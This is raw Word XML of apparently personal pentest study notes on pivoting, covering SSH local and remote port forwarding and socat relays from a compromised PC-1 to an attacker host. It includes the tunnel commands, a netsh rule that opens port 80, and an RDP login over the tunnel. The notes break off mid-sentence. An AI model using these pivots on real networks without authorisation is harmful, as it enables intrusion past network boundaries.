    <w:p w14:paraId="6AA8C08F" w14:textId="28749E9C" w:rsidR="00531CE1" w:rsidRDefault="00531CE1" w:rsidP="00531CE1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FCC46AC" wp14:editId="0F5DDA8A">
            <wp:extent cx="1727200" cy="1664992"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="867282911" name="Picture 2" descr="A computer screen shot of a computer scr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2911" name="Picture 2" descr="A computer screen shot of a computer scrip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7986" cy="1675389"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4B595" w14:textId="1FC773F8" w:rsidR="00C551EC" w:rsidRDefault="00C551EC" w:rsidP="00C551EC">
      <w:r>
        <w:t>Ex:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6800937F" w14:textId="39930732" w:rsidR="00C551EC" w:rsidRDefault="00C551EC" w:rsidP="00C551EC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5887D78A" wp14:editId="0E8CEE08">
            <wp:extent cx="4196080" cy="1401383"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="955523015"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3015" name="Picture 4" descr="A diagram of a computer&#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03724" cy="1403936"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="145C5C26" w14:textId="4B0624EF" w:rsidR="00C551EC" w:rsidRDefault="00C551EC" w:rsidP="00C551EC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ON PC1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C551EC">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>C:\&gt; ssh tunneluser@1.1.1.1 -L *:80:127.0.0.1:80 -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496D289" w14:textId="2CF9C347" w:rsidR="004F46C1" w:rsidRDefault="004F46C1" w:rsidP="004F46C1">
      <w:r w:rsidRPr="004F46C1">
        <w:t>PC-1 listens on port 80, forwards to 1.1.1.1:80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004F46C1">
        <w:t>send traffic to PC-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84EAC3" w14:textId="7C321D57" w:rsidR="004F46C1" w:rsidRDefault="004F46C1" w:rsidP="004F46C1">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r w:rsidRPr="004F46C1">
        <w:t xml:space="preserve">Attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="004F46C1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r w:rsidRPr="004F46C1">
        <w:t xml:space="preserve"> PC-1 </w:t>
      </w:r>
      <w:r w:rsidRPr="004F46C1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r w:rsidRPr="004F46C1">
        <w:t xml:space="preserve"> Internal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E5AF4" w14:textId="2A0BB1A8" w:rsidR="00C551EC" w:rsidRDefault="00C551EC" w:rsidP="00C551EC">
      <w:r w:rsidRPr="00C551EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-L</w:t>
      </w:r>
      <w:r w:rsidRPr="00C551EC">
        <w:t> option for local port forwarding. This option requires us to indicate the local socket used by PC-1 to receive connections</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5704DFBA" w14:textId="4F3DA2AE" w:rsidR="00ED6321" w:rsidRPr="00ED6321" w:rsidRDefault="00ED6321" w:rsidP="00ED6321">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED6321">
        <w:t xml:space="preserve">Opens </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6321">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port 80 on PC-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6321">
        <w:t xml:space="preserve"> (binds to all interfaces *).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107D056" w14:textId="776F54B7" w:rsidR="00ED6321" w:rsidRPr="00ED6321" w:rsidRDefault="00ED6321" w:rsidP="00ED6321">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED6321">
        <w:t xml:space="preserve">Traffic sent to PC-1:80 is </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6321">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>forwarded to the attacker's machine port 80</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6321">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5124DF07" w14:textId="14FFB177" w:rsidR="00C551EC" w:rsidRDefault="00ED6321" w:rsidP="00ED6321">
      <w:r w:rsidRPr="00ED6321">
        <w:t>need a firewall rule on PC-1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6321">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2746FE6B" w14:textId="7C49AB3C" w:rsidR="00531CE1" w:rsidRPr="00B34114" w:rsidRDefault="004F46C1" w:rsidP="00BF7996">
      <w:pPr>
        <w:rPr>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34114">
        <w:rPr>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve">Now Attacker send traffic to PC-1 on port 80 and this traffic will be forwarded to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FCEBC0" w14:textId="2B85C8BD" w:rsidR="00262416" w:rsidRPr="00BF7996" w:rsidRDefault="00BF7996" w:rsidP="00BF7996">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7996">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote Port Forwarding (R &gt; L)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D50FD" w14:textId="1ED3A009" w:rsidR="0079383F" w:rsidRDefault="00BF7996" w:rsidP="00BF7996">
      <w:r w:rsidRPr="00BF7996">
        <w:t>allows you to forward a port on the remote machine to a port on your local machine.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BD53E2" w14:textId="36233579" w:rsidR="00BF7996" w:rsidRDefault="00BF7996" w:rsidP="00BF7996">
      <w:r>
        <w:t xml:space="preserve">Used </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7996">
        <w:t>when you want a service running on your local machine to be accessible from the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27002115" w14:textId="77777777" w:rsidR="00B34114" w:rsidRDefault="00B34114" w:rsidP="00BF7996"/>
    <w:p w14:paraId="100C61E4" w14:textId="3893AE88" w:rsidR="00BF7996" w:rsidRDefault="00A06D4D" w:rsidP="00A06D4D">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A06D4D">
        <w:t>ssh -R remote_port:local_host:local_port user@ssh_server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1FF1B7" w14:textId="1A78EB80" w:rsidR="00BF7996" w:rsidRPr="00B34114" w:rsidRDefault="00A06D4D" w:rsidP="00A06D4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">forward the traffic from </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06D4D">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>remote_server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on port </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06D4D">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>remote_port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to my local machine on port </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06D4D">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>local_port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2270E51C" w14:textId="77777777" w:rsidR="00B34114" w:rsidRDefault="00B34114" w:rsidP="00B34114">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC3775B" w14:textId="6487C7C4" w:rsidR="008F3FFB" w:rsidRDefault="0002127A" w:rsidP="008F3FFB">
      <w:r>
        <w:t>Ex:</w:t>
      </w:r>
      <w:r w:rsidR="00C551EC">
        <w:t xml:space="preserve"> Making Remote Port Forwarding on pivot machine (this is equivalent to making Local port Forwarding on attacker machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8D3AF" w14:textId="677C1F23" w:rsidR="0002127A" w:rsidRDefault="0002127A" w:rsidP="008F3FFB">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3761EE60" wp14:editId="40DEFD98">
            <wp:extent cx="4267200" cy="1435583"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1025031158"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1158" name="Picture 3" descr="A diagram of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId46" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="5385" t="2555" r="2393" b="4695"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4276019" cy="1438550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E3AD3C" w14:textId="60BAD8D3" w:rsidR="0002127A" w:rsidRDefault="008F3FFB" w:rsidP="004668D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ON PC1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>C:\&gt; ssh tunneluser@1.1.1.1 -R 3389:3.3.3.3:3389 -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0313C" w14:textId="77D3CF5D" w:rsidR="004F46C1" w:rsidRDefault="004F46C1" w:rsidP="004F46C1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004F46C1">
        <w:t>Opens port 3389 on the attacker machine, tunnels to 3.3.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914F918" w14:textId="14A4F3A0" w:rsidR="00B34114" w:rsidRDefault="004F46C1" w:rsidP="00B34114">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004F46C1">
        <w:t xml:space="preserve">PC-1 </w:t>
      </w:r>
      <w:r w:rsidRPr="004F46C1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r w:rsidRPr="004F46C1">
        <w:t xml:space="preserve"> Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AEFFD9" w14:textId="0276FFFB" w:rsidR="00B34114" w:rsidRPr="00B34114" w:rsidRDefault="00B34114" w:rsidP="00B34114">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="77206D" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34114">
        <w:rPr>
          <w:color w:val="77206D" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s like tell ssh: Open a listening port </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="77206D" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>on your side</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34114">
        <w:rPr>
          <w:color w:val="77206D" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3389). If anyone connects there, forward that traffic through the tunnel, and send it to 3.3.3.3:338</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5218F5D1" w14:textId="6956C561" w:rsidR="0002127A" w:rsidRDefault="008F3FFB" w:rsidP="008F3FFB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008F3FFB">
        <w:t>This will establish an SSH session from PC-1 to 1.1.1.1 (Attacker PC) using the </w:t>
      </w:r>
      <w:r w:rsidRPr="008F3FFB">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>tunneluser</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3FFB">
        <w:t> user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> created on attacker machine</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3FFB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B76C38" w14:textId="153F1421" w:rsidR="00977452" w:rsidRDefault="00977452" w:rsidP="00977452">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00977452">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-R</w:t>
      </w:r>
      <w:r w:rsidRPr="00977452">
        <w:t> switch is used to request a remote port forward, and the syntax requires us first to indicate the port we will be opening at the SSH server (3389)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “the remote port” that will be forwarded to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00977452">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ip:Port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> after the column “in this case: 3.3.3.3:3389”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D02BE" w14:textId="77777777" w:rsidR="00977452" w:rsidRDefault="00977452" w:rsidP="00977452">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B34114">
        <w:rPr>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve">ON ATTCKER PC: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359E320D" w14:textId="3E00BC1A" w:rsidR="0002127A" w:rsidRDefault="00977452" w:rsidP="00977452">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="512323"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="512323"/>
        </w:rPr>
        <w:t>munra@attacker-pc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FD971F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="512323"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="512323"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="512323"/>
        </w:rPr>
        <w:t>xfreerdp /v:127.0.0.1 /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="512323"/>
        </w:rPr>
        <w:t>u:MyUser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="512323"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="512323"/>
        </w:rPr>
        <w:t>p:MyPassword</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="393326A8" w14:textId="7A968B65" w:rsidR="00977452" w:rsidRDefault="001218AC" w:rsidP="00977452">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="00977452">
        <w:t xml:space="preserve"> is a command that </w:t>
      </w:r>
      <w:r w:rsidR="002420A0">
        <w:t>opens</w:t>
      </w:r>
      <w:r w:rsidR="00977452">
        <w:t xml:space="preserve"> rdp on attacker machine, this command hits the 3389 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00977452">
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00977452">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="003231A9">
        <w:t>the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00977452">
        <w:t xml:space="preserve"> machine, this port on attacker machine is forwarded to 3.3.3.3:3389 so the rdp connection will be redirected to this address through the ssh tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C6E0E" w14:textId="77777777" w:rsidR="0002127A" w:rsidRDefault="0002127A" w:rsidP="0002127A"/>
    <w:p w14:paraId="77446165" w14:textId="77777777" w:rsidR="003231A9" w:rsidRDefault="003231A9" w:rsidP="0002127A"/>
    <w:p w14:paraId="3C73BB2C" w14:textId="77777777" w:rsidR="00FA7944" w:rsidRPr="00FA7944" w:rsidRDefault="00FA7944" w:rsidP="00FA7944">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA7944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port Forwarding With socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154F29BA" w14:textId="19007401" w:rsidR="00D667B9" w:rsidRDefault="00D667B9" w:rsidP="00D667B9">
      <w:r>
        <w:t>Agent installed on pivot device, not tunnel but port forwarding, it is just forwards the TCP Traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC59656" w14:textId="45DCFE37" w:rsidR="00D667B9" w:rsidRDefault="00D667B9" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t xml:space="preserve"> TCP4-LISTEN:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t>listen_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t>&gt;,fork</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t xml:space="preserve"> TCP4:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t>target_host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t>&gt;:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4DDEA8" w14:textId="77777777" w:rsidR="00D667B9" w:rsidRDefault="00D667B9" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D667B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fork</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D667B9">
        <w:t xml:space="preserve"> allows socat to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t>fork</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D667B9">
        <w:t xml:space="preserve"> a new process for each connection received, making it possible to handle multiple connections without closing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C408E4" w14:textId="04E0634B" w:rsidR="00D667B9" w:rsidRDefault="00D667B9" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D667B9">
        <w:lastRenderedPageBreak/>
        <w:t>If you don't include it, socat will close when the first connection made is finished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721621FB" w14:textId="77777777" w:rsidR="00D667B9" w:rsidRDefault="00D667B9" w:rsidP="00F46094"/>
    <w:p w14:paraId="1AEDCB0F" w14:textId="1568736E" w:rsidR="00F46094" w:rsidRDefault="00F46094" w:rsidP="00F46094">
      <w:r>
        <w:tab/>
        <w:t>EX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7644049D" w14:textId="331D83C5" w:rsidR="00D667B9" w:rsidRDefault="00D667B9" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E54EED7" wp14:editId="7B6EDF31">
            <wp:extent cx="4287520" cy="1158455"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1878280708" name="Picture 6" descr="A computer with a computer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0708" name="Picture 6" descr="A computer with a computer connection&#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5174" cy="1163225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8F9E0C" w14:textId="7577C371" w:rsidR="00D667B9" w:rsidRDefault="00D667B9" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ON PC1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D667B9">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>C:\&gt;socat TCP4-LISTEN:3389,fork TCP4:3.3.3.3:3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63471CD9" w14:textId="519926B5" w:rsidR="003231A9" w:rsidRDefault="00D667B9" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is just like Proxy or SSH Local Port Forwarding so we also </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> add firewall role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486527F1" w14:textId="77777777" w:rsidR="00F46094" w:rsidRDefault="00F46094" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E16CFE3" w14:textId="77777777" w:rsidR="00F46094" w:rsidRDefault="00F46094" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0466E3AC" w14:textId="0402C31F" w:rsidR="00F46094" w:rsidRDefault="00F46094" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>To Reverse the process and make it like the SSH Remote Port Forwarding and open the port on the attacker machine</w:t>
      </w:r>
    </w:p>
